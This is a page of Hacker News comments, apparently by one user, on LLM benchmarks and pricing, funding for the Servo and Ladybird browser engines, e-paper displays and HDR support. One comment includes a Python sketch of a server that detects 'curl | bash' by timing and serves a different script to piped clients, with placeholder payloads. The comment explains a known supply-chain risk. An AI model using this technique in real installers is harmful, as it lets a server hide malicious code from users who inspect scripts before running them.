up6w6's comments

I am very suspicious of the results. A few months ago they published an LLM benchmark, calling it "perfect", while it actually contained only around 50 inputs (academic benchmark datasets usually contain tens of thousands of inputs).


Very audacious to call it "almost perfect" when it has only what appears to be 50 questions. For comparison, MMLU contains 57 tasks and about 14,000 test questions.


I remember that you can detect "curl | bash" server-side and serve a different script than what the user would get by downloading it through other methods[1]. But yeah, the binary itself already has enough attack surface.

[1] https://news.ycombinator.com/item?id=34145799
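
For anyone curious, the trick described in the linked thread is (as I understand it) a timing one: bash executes a piped script while it is still downloading, so the server can slip in a `sleep`, keep sending, and watch whether its own writes stall. Below is a minimal sketch of that idea in Python; the port, padding size, timing threshold, and payloads are all made up for illustration, and real OS buffer sizes vary.

    # Sketch: detect "curl | bash" by timing how fast the client drains data.
    # An early `sleep` only stalls the transfer if bash is executing the
    # script as it streams in; a plain download drains the padding at once.
    import socket
    import time

    # Must exceed the TCP send/receive buffers plus the pipe buffer so that
    # sendall() below actually blocks while bash sits in the sleep.
    PADDING = b"#" + b"A" * (32 * 1024 * 1024) + b"\n"

    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("0.0.0.0", 8080))
    srv.listen(1)
    conn, _ = srv.accept()
    conn.recv(4096)  # discard the HTTP request
    conn.sendall(b"HTTP/1.1 200 OK\r\nContent-Type: text/plain\r\nConnection: close\r\n\r\n")
    conn.sendall(b"sleep 3\n")          # harmless in a saved file, blocking if piped into bash
    start = time.monotonic()
    conn.sendall(PADDING)               # stalls while a piped bash is stuck in the sleep
    piped_into_bash = time.monotonic() - start > 2
    conn.sendall(b"echo evil\n" if piped_into_bash else b"echo benign\n")
    conn.close()
    srv.close()

A plain `curl -o install.sh` drains the padding immediately, so the timing check stays under the threshold and the benign script is served; real detectors have to be more careful about buffer sizes, which is why the padding here is so large.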


Not only that, but Servo is receiving less than 3,000 USD/month in donations, below their goal of 10k/month, and far less than what they deserve considering that Ladybird is receiving millions.

https://servo.org/blog/2024/06/28/input-text-emoji-devtools/


Would be neat if Ladybird ended up depending on and helping fund Servo. That would fit both projects' missions: Servo could continue focusing on the rendering engine, and Ladybird could outsource effort on that part of the code.


How did you figure Ladybird is receiving millions?


They likely meant just one million USD + other smaller donations.

https://news.ycombinator.com/item?id=40856791


Does anyone know the current status of Apple silicon hardware emulation in QEMU?


Related news: Servo Web Engine Continues Advancing But Seeing Just $1.6k In Monthly Donations

https://www.phoronix.com/news/Servo-Engine-May-2024


> Lack of speed and ghosting felt like it made traditional Eink impossible to do most computing tasks. So we focused on making the most Paperlike epaper display that has no ghosting and high refresh rate - 60 to 120fps. We started working on this in 2018.

The website mentions 60 Hz; will it also support 120 Hz?


We're trying to underpromise and overdeliver, and our display can now do 60–120 fps, but believe it or not, our PDF renderer and software can't match that yet.

So we're waiting till we can holistically do 120 fps before announcing that.

But if you do frame rate tests, you'll see it's 120 fps.

(For the nerds out there, it's 6 Hz–120 Hz variable refresh rate IGZO.)


While we are talking "LCD", "In direct sunlight", and "display is close to surface": were you able to fit circular polarizers in there, or will I need to take my sunglasses off when using it?


How is the latency from input to visuals?

For example, on an iPad Pro at 120 Hz, it feels really close to actually just moving paper around. Does the Daylight Computer match that input latency?


This is the big question. If they (or any company) can squeeze out sub-10ms latency for touch/pen interactions on an e-ink-like screen (like the Daylight), that will be a game-changer.


The Opus model, which seems to perform better than GPT-4, is unfortunately much more expensive than the OpenAI model.

Pricing (input/output per million tokens):

GPT-4 Turbo: $10 / $30

Claude 3 Opus: $15 / $75
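
To put those rates in per-request terms, here is a quick back-of-the-envelope sketch; only the per-million prices above are taken from the published pricing, and the token counts are illustrative.

    # Rough per-request cost from the per-million-token rates above.
    # Token counts below are illustrative, not from any real workload.
    PRICES_USD_PER_MTOK = {            # (input, output)
        "gpt-4-turbo": (10.0, 30.0),
        "claude-3-opus": (15.0, 75.0),
    }

    def request_cost(model: str, input_tokens: int, output_tokens: int) -> float:
        inp, out = PRICES_USD_PER_MTOK[model]
        return (input_tokens * inp + output_tokens * out) / 1_000_000

    print(request_cost("claude-3-opus", 200_000, 1_000))  # ~$3.08 at Opus's full 200K context
    print(request_cost("gpt-4-turbo", 128_000, 1_000))    # ~$1.31 at Turbo's full 128K context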


There’s a market for that though. If I am running a startup to generate video meeting summaries, the price of the models might matter a lot, because I can only charge so much for this service. On the other hand, if I’m selling a tool to have AI look for discrepancies in mergers and acquisitions contracts, the difference between $1 and $5 is immaterial… I’d be happy to pay 5x more for software that is 10% better because the numbers are so low to begin with.

My point is that there’s plenty of room for high priced but only slightly better models.


That's quite expensive indeed. At the full context of 200K tokens, that would be at least $3 per use. I would hate to get a refusal as the answer at that rate.


Cost is relative. How much would it cost for a human to read 200k tokens and give you an answer? Probably much more than $3.


You are not going to take the expensive human out of the loop where downside risk is high. You are likely to take the human out of the loop only in low risk low cost operations to begin with. For those use cases, these models are quite expensive.


Yeah, but the human tends not to get morally indignant because my question involves killing a process to save resources.


Their smallest model outperforms GPT-4 on Code. I'm sceptical that it'll hold up to real-world use, though.


Just a note that the 67.0% HumanEval figure for GPT-4 is from its first release in March 2023. The actual performance of current ChatGPT-4 on similar problems might be better due to OpenAI's internal system prompts, possible fine-tuning, and other tricks.


Yeah, the pricing I think is really interesting: 150% more expensive input tokens, 250% more expensive output tokens. I wonder what's behind that?

That suggests the inference time is more expensive than the memory needed to load it in the first place, I guess?


Either something like that or just because the model's output is basically the best you can get and they utilize their market position.

Probably that and what you mentioned.


This. Price is set by value delivered and what the market will pay for whatever capacity they have; it’s not a cost + X% market.


I'm more curious about the input/output token discrepancy.

Their pricing suggests that either output tokens are more expensive for some technical reason, or they're trying to encourage a specific type of usage pattern, etc.


Or that market research showed a higher price for input tokens would drive customers away, while a lower price for output tokens would leave money on the table.


> 150% more expensive input tokens 250% more expensive output tokens, I wonder what's behind that?

Nitpick: it's 50% and 150% more, respectively ($10 → $15 input, $30 → $75 output).


The ChatGPT-3.5 price reduction seems to be a direct response to Mixtral, which was cheaper (~$0.0019 vs. $0.0020 per 1K tokens) and better (https://arena.lmsys.org/) until now.


Sadly, we will still have to wait for applications to catch up: Firefox doesn't have HDR support even on Windows right now.

